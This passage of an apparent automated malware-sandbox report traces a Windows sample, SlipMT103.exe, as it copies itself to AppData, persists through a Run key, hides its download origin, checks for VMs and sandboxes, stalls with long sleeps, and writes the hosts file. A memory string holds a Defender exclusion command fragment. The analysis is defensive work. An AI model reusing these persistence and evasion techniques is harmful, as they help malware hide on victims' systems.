                      Source: C:\Users\user\Desktop\SlipMT103.exe | Code function: 1_2_00459347 push ds; ret
                      Source: C:\Users\user\Desktop\SlipMT103.exe | Code function: 1_2_00459361 push ds; retf
                      Source: C:\Users\user\Desktop\SlipMT103.exe | Code function: 1_2_004592F5 push ds; ret
                      Source: C:\Users\user\Desktop\SlipMT103.exe | Code function: 1_2_00939EF8 push eax; ret
                      Source: C:\Users\user\Desktop\SlipMT103.exe | Code function: 1_2_00933F65 push esp; iretd
                      Source: C:\Users\user\Desktop\SlipMT103.exe | Code function: 1_2_00B87E3F push edi; retn 0000h
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Code function: 10_2_00EE9361 push ds; retf
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Code function: 10_2_00EE92F5 push ds; ret
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Code function: 10_2_00EE9347 push ds; ret
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Code function: 10_2_059B56E0 push esp; iretd
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Code function: 12_2_007292F5 push ds; ret
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Code function: 12_2_00729361 push ds; retf
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Code function: 12_2_00729347 push ds; ret
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Code function: 13_2_00979347 push ds; ret
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Code function: 13_2_009792F5 push ds; ret
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Code function: 13_2_00979361 push ds; retf
                      Source: initial sample | Static PE information: section name: .text entropy: 7.88568951342
                      Source: C:\Users\user\Desktop\SlipMT103.exe | File created: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
                      Source: C:\Users\user\Desktop\SlipMT103.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run kprUEGC

                      Hooking and other Techniques for Hiding and Protection:

                      Hides that the sample has been downloaded from the Internet (zone.identifier)
                      Source: C:\Users\user\Desktop\SlipMT103.exe | File opened: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe:Zone.Identifier read attributes | delete
                      Source: C:\Users\user\Desktop\SlipMT103.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\Desktop\SlipMT103.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      Yara detected AntiVM3Show sources
                      Source: Yara matchFile source: 0.2.SlipMT103.exe.2b58e5c.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.kprUEGC.exe.3408f00.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.kprUEGC.exe.349b0f8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SlipMT103.exe.2beae3c.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.360382819.0000000002AF1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.451118533.00000000033A1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.451324743.000000000346B000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.360569240.0000000002BBA000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: SlipMT103.exe PID: 6388, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: kprUEGC.exe PID: 2900, type: MEMORYSTR
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: SlipMT103.exe, 00000000.00000002.360382819.0000000002AF1000.00000004.00000001.sdmp, SlipMT103.exe, 00000000.00000002.360569240.0000000002BBA000.00000004.00000001.sdmp, kprUEGC.exe, 0000000A.00000002.451324743.000000000346B000.00000004.00000001.sdmp, kprUEGC.exe, 0000000A.00000002.451118533.00000000033A1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: SlipMT103.exe, 00000000.00000002.360382819.0000000002AF1000.00000004.00000001.sdmp, SlipMT103.exe, 00000000.00000002.360569240.0000000002BBA000.00000004.00000001.sdmp, kprUEGC.exe, 0000000A.00000002.451324743.000000000346B000.00000004.00000001.sdmp, kprUEGC.exe, 0000000A.00000002.451118533.00000000033A1000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\SlipMT103.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\SlipMT103.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\Desktop\SlipMT103.exe TID: 6436 | Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Users\user\Desktop\SlipMT103.exe TID: 6436 | Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\Desktop\SlipMT103.exe TID: 6440 | Thread sleep count: 1554 > 30
Source: C:\Users\user\Desktop\SlipMT103.exe TID: 6436 | Thread sleep time: -239859s >= -30000s
Source: C:\Users\user\Desktop\SlipMT103.exe TID: 6440 | Thread sleep count: 713 > 30
Source: C:\Users\user\Desktop\SlipMT103.exe TID: 6392 | Thread sleep time: -40889s >= -30000s
Source: C:\Users\user\Desktop\SlipMT103.exe TID: 6436 | Thread sleep time: -239750s >= -30000s
Source: C:\Users\user\Desktop\SlipMT103.exe TID: 6436 | Thread sleep time: -239640s >= -30000s
Source: C:\Users\user\Desktop\SlipMT103.exe TID: 6436 | Thread sleep time: -239529s >= -30000s
Source: C:\Users\user\Desktop\SlipMT103.exe TID: 6436 | Thread sleep time: -239421s >= -30000s
Source: C:\Users\user\Desktop\SlipMT103.exe TID: 6436 | Thread sleep time: -239312s >= -30000s
Source: C:\Users\user\Desktop\SlipMT103.exe TID: 6436 | Thread sleep time: -239188s >= -30000s
Source: C:\Users\user\Desktop\SlipMT103.exe TID: 6436 | Thread sleep time: -239059s >= -30000s
Source: C:\Users\user\Desktop\SlipMT103.exe TID: 6436 | Thread sleep time: -238936s >= -30000s
Source: C:\Users\user\Desktop\SlipMT103.exe TID: 6436 | Thread sleep time: -238778s >= -30000s
Source: C:\Users\user\Desktop\SlipMT103.exe TID: 6436 | Thread sleep time: -238640s >= -30000s
Source: C:\Users\user\Desktop\SlipMT103.exe TID: 6436 | Thread sleep time: -238531s >= -30000s
Source: C:\Users\user\Desktop\SlipMT103.exe TID: 6436 | Thread sleep time: -238420s >= -30000s
Source: C:\Users\user\Desktop\SlipMT103.exe TID: 6436 | Thread sleep time: -238312s >= -30000s
Source: C:\Users\user\Desktop\SlipMT103.exe TID: 6436 | Thread sleep time: -238047s >= -30000s
Source: C:\Users\user\Desktop\SlipMT103.exe TID: 6436 | Thread sleep time: -237641s >= -30000s
Source: C:\Users\user\Desktop\SlipMT103.exe TID: 6436 | Thread sleep time: -237438s >= -30000s
Source: C:\Users\user\Desktop\SlipMT103.exe TID: 6436 | Thread sleep time: -237250s >= -30000s
Source: C:\Users\user\Desktop\SlipMT103.exe TID: 6436 | Thread sleep time: -236641s >= -30000s
Source: C:\Users\user\Desktop\SlipMT103.exe TID: 6436 | Thread sleep time: -236188s >= -30000s
Source: C:\Users\user\Desktop\SlipMT103.exe TID: 6436 | Thread sleep time: -236047s >= -30000s
Source: C:\Users\user\Desktop\SlipMT103.exe TID: 6420 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\SlipMT103.exe TID: 6912 | Thread sleep time: -24903104499507879s >= -30000s
Source: C:\Users\user\Desktop\SlipMT103.exe TID: 6920 | Thread sleep count: 1732 > 30
Source: C:\Users\user\Desktop\SlipMT103.exe TID: 6920 | Thread sleep count: 8087 > 30
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 348 | Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 348 | Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 4544 | Thread sleep count: 1933 > 30
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 348 | Thread sleep time: -239860s >= -30000s
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 4544 | Thread sleep count: 1463 > 30
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 5524 | Thread sleep time: -34928s >= -30000s
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 348 | Thread sleep time: -239688s >= -30000s
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 348 | Thread sleep time: -239578s >= -30000s
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 348 | Thread sleep time: -239469s >= -30000s
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 348 | Thread sleep time: -239359s >= -30000s
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 348 | Thread sleep time: -239250s >= -30000s
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 348 | Thread sleep time: -239125s >= -30000s
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 348 | Thread sleep time: -239016s >= -30000s
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 348 | Thread sleep time: -238891s >= -30000s
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 348 | Thread sleep time: -238750s >= -30000s
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 348 | Thread sleep time: -238547s >= -30000s
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 348 | Thread sleep time: -238422s >= -30000s
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 348 | Thread sleep time: -238094s >= -30000s
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 348 | Thread sleep time: -237922s >= -30000s
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 348 | Thread sleep time: -237811s >= -30000s
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 348 | Thread sleep time: -237703s >= -30000s
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 348 | Thread sleep time: -237594s >= -30000s
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 348 | Thread sleep time: -237391s >= -30000s
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 348 | Thread sleep time: -237000s >= -30000s
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 348 | Thread sleep time: -236750s >= -30000s
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 348 | Thread sleep time: -236438s >= -30000s
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 348 | Thread sleep time: -235094s >= -30000s
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 348 | Thread sleep time: -234797s >= -30000s
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 348 | Thread sleep time: -234671s >= -30000s
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 348 | Thread sleep time: -234547s >= -30000s
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 5100 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 6868 | Thread sleep time: -27670116110564310s >= -30000s
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 6796 | Thread sleep count: 6267 > 30
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 6796 | Thread sleep count: 3552 > 30
Source: C:\Users\user\Desktop\SlipMT103.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\SlipMT103.exe | Thread delayed: delay time: 240000
Source: C:\Users\user\Desktop\SlipMT103.exe | Thread delayed: delay time: 239859
Source: C:\Users\user\Desktop\SlipMT103.exe | Thread delayed: delay time: 239750
Source: C:\Users\user\Desktop\SlipMT103.exe | Thread delayed: delay time: 239640
Source: C:\Users\user\Desktop\SlipMT103.exe | Thread delayed: delay time: 239529
Source: C:\Users\user\Desktop\SlipMT103.exe | Thread delayed: delay time: 239421
Source: C:\Users\user\Desktop\SlipMT103.exe | Thread delayed: delay time: 239312
Source: C:\Users\user\Desktop\SlipMT103.exe | Thread delayed: delay time: 239188
Source: C:\Users\user\Desktop\SlipMT103.exe | Thread delayed: delay time: 239059
Source: C:\Users\user\Desktop\SlipMT103.exe | Thread delayed: delay time: 238936
Source: C:\Users\user\Desktop\SlipMT103.exe | Thread delayed: delay time: 238778
Source: C:\Users\user\Desktop\SlipMT103.exe | Thread delayed: delay time: 238640
Source: C:\Users\user\Desktop\SlipMT103.exe | Thread delayed: delay time: 238531
Source: C:\Users\user\Desktop\SlipMT103.exe | Thread delayed: delay time: 238420
Source: C:\Users\user\Desktop\SlipMT103.exe | Thread delayed: delay time: 238312
Source: C:\Users\user\Desktop\SlipMT103.exe | Thread delayed: delay time: 238047
Source: C:\Users\user\Desktop\SlipMT103.exe | Thread delayed: delay time: 237641
Source: C:\Users\user\Desktop\SlipMT103.exe | Thread delayed: delay time: 237438
Source: C:\Users\user\Desktop\SlipMT103.exe | Thread delayed: delay time: 237250
Source: C:\Users\user\Desktop\SlipMT103.exe | Thread delayed: delay time: 236641
Source: C:\Users\user\Desktop\SlipMT103.exe | Thread delayed: delay time: 236188
Source: C:\Users\user\Desktop\SlipMT103.exe | Thread delayed: delay time: 236047
Source: C:\Users\user\Desktop\SlipMT103.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\SlipMT103.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Thread delayed: delay time: 240000
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Thread delayed: delay time: 239860
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Thread delayed: delay time: 239688
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Thread delayed: delay time: 239578
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Thread delayed: delay time: 239469
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Thread delayed: delay time: 239359
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Thread delayed: delay time: 239250
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Thread delayed: delay time: 239125
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Thread delayed: delay time: 239016
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Thread delayed: delay time: 238891
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Thread delayed: delay time: 238750
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Thread delayed: delay time: 238547
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Thread delayed: delay time: 238422
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Thread delayed: delay time: 238094
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Thread delayed: delay time: 237922
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Thread delayed: delay time: 237811
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Thread delayed: delay time: 237703
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Thread delayed: delay time: 237594
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Thread delayed: delay time: 237391
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Thread delayed: delay time: 237000
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Thread delayed: delay time: 236750
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Thread delayed: delay time: 236438
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Thread delayed: delay time: 235094
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Thread delayed: delay time: 234797
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Thread delayed: delay time: 234671
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Thread delayed: delay time: 234547
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\SlipMT103.exe | Window / User API: threadDelayed 1554
Source: C:\Users\user\Desktop\SlipMT103.exe | Window / User API: threadDelayed 713
Source: C:\Users\user\Desktop\SlipMT103.exe | Window / User API: threadDelayed 1732
Source: C:\Users\user\Desktop\SlipMT103.exe | Window / User API: threadDelayed 8087
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Window / User API: threadDelayed 1933
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Window / User API: threadDelayed 1463
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Window / User API: threadDelayed 6267
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Window / User API: threadDelayed 3552
Source: C:\Users\user\Desktop\SlipMT103.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\SlipMT103.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\SlipMT103.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\SlipMT103.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\SlipMT103.exe | Thread delayed: delay time: 240000
Source: C:\Users\user\Desktop\SlipMT103.exe | Thread delayed: delay time: 239859
Source: C:\Users\user\Desktop\SlipMT103.exe | Thread delayed: delay time: 40889
Source: C:\Users\user\Desktop\SlipMT103.exe | Thread delayed: delay time: 239750
Source: C:\Users\user\Desktop\SlipMT103.exe | Thread delayed: delay time: 239640
Source: C:\Users\user\Desktop\SlipMT103.exe | Thread delayed: delay time: 239529
Source: C:\Users\user\Desktop\SlipMT103.exe | Thread delayed: delay time: 239421
Source: C:\Users\user\Desktop\SlipMT103.exe | Thread delayed: delay time: 239312
Source: C:\Users\user\Desktop\SlipMT103.exe | Thread delayed: delay time: 239188
Source: C:\Users\user\Desktop\SlipMT103.exe | Thread delayed: delay time: 239059
Source: C:\Users\user\Desktop\SlipMT103.exe | Thread delayed: delay time: 238936
Source: C:\Users\user\Desktop\SlipMT103.exe | Thread delayed: delay time: 238778
Source: C:\Users\user\Desktop\SlipMT103.exe | Thread delayed: delay time: 238640
Source: C:\Users\user\Desktop\SlipMT103.exe | Thread delayed: delay time: 238531
Source: C:\Users\user\Desktop\SlipMT103.exe | Thread delayed: delay time: 238420
Source: C:\Users\user\Desktop\SlipMT103.exe | Thread delayed: delay time: 238312
Source: C:\Users\user\Desktop\SlipMT103.exe | Thread delayed: delay time: 238047
Source: C:\Users\user\Desktop\SlipMT103.exe | Thread delayed: delay time: 237641
Source: C:\Users\user\Desktop\SlipMT103.exe | Thread delayed: delay time: 237438
Source: C:\Users\user\Desktop\SlipMT103.exe | Thread delayed: delay time: 237250
Source: C:\Users\user\Desktop\SlipMT103.exe | Thread delayed: delay time: 236641
Source: C:\Users\user\Desktop\SlipMT103.exe | Thread delayed: delay time: 236188
Source: C:\Users\user\Desktop\SlipMT103.exe | Thread delayed: delay time: 236047
Source: C:\Users\user\Desktop\SlipMT103.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\SlipMT103.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Thread delayed: delay time: 240000
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Thread delayed: delay time: 239860
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Thread delayed: delay time: 34928
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Thread delayed: delay time: 239688
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Thread delayed: delay time: 239578
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Thread delayed: delay time: 239469
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Thread delayed: delay time: 239359
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Thread delayed: delay time: 239250
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Thread delayed: delay time: 239125
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Thread delayed: delay time: 239016
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Thread delayed: delay time: 238891
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Thread delayed: delay time: 238750
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Thread delayed: delay time: 238547
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Thread delayed: delay time: 238422
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Thread delayed: delay time: 238094
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Thread delayed: delay time: 237922
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Thread delayed: delay time: 237811
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Thread delayed: delay time: 237703
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Thread delayed: delay time: 237594
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Thread delayed: delay time: 237391
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Thread delayed: delay time: 237000
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Thread delayed: delay time: 236750
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Thread delayed: delay time: 236438
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Thread delayed: delay time: 235094
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Thread delayed: delay time: 234797
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Thread delayed: delay time: 234671
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Thread delayed: delay time: 234547
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Thread delayed: delay time: 922337203685477
Source: kprUEGC.exe, 0000000A.00000002.451118533.00000000033A1000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: kprUEGC.exe, 0000000A.00000002.451118533.00000000033A1000.00000004.00000001.sdmp | Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: kprUEGC.exe, 0000000A.00000002.451118533.00000000033A1000.00000004.00000001.sdmp | Binary or memory string: vmware
Source: kprUEGC.exe, 0000000A.00000002.451118533.00000000033A1000.00000004.00000001.sdmp | Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: C:\Users\user\Desktop\SlipMT103.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\SlipMT103.exe | Code function: 1_2_00B8CE40 LdrInitializeThunk,
Source: C:\Users\user\Desktop\SlipMT103.exe | Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

Modifies the hosts file
Source: C:\Users\user\Desktop\SlipMT103.exe | File written: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\SlipMT103.exe | Process created: C:\Users\user\Desktop\SlipMT103.exe C:\Users\user\Desktop\SlipMT103.exe
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Process created: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
Source: SlipMT103.exe, 00000001.00000002.625902273.0000000001160000.00000002.00020000.sdmp, kprUEGC.exe, 0000000C.00000002.623212644.00000000013E0000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
Source: SlipMT103.exe, 00000001.00000002.625902273.0000000001160000.00000002.00020000.sdmp, kprUEGC.exe, 0000000C.00000002.623212644.00000000013E0000.00000002.00020000.sdmp | Binary or memory string: Progman
Source: SlipMT103.exe, 00000001.00000002.625902273.0000000001160000.00000002.00020000.sdmp, kprUEGC.exe, 0000000C.00000002.623212644.00000000013E0000.00000002.00020000.sdmp | Binary or memory string: &Program Manager
Source: SlipMT103.exe, 00000001.00000002.625902273.0000000001160000.00000002.00020000.sdmp, kprUEGC.exe, 0000000C.00000002.623212644.00000000013E0000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\SlipMT103.exe | Queries volume information: C:\Users\user\Desktop\SlipMT103.exe VolumeInformation
Source: C:\Users\user\Desktop\SlipMT103.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\SlipMT103.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Linq\v4.0_4.0.0.0__b77a5c561934e089\System.Data.Linq.dll VolumeInformation
Source: C:\Users\user\Desktop\SlipMT103.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\Desktop\SlipMT103.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\Desktop\SlipMT103.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\Desktop\SlipMT103.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\Desktop\SlipMT103.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\Desktop\SlipMT103.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\Desktop\SlipMT103.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\SlipMT103.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\SlipMT103.exe | Queries volume information: C:\Users\user\Desktop\SlipMT103.exe VolumeInformation
Source: C:\Users\user\Desktop\SlipMT103.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
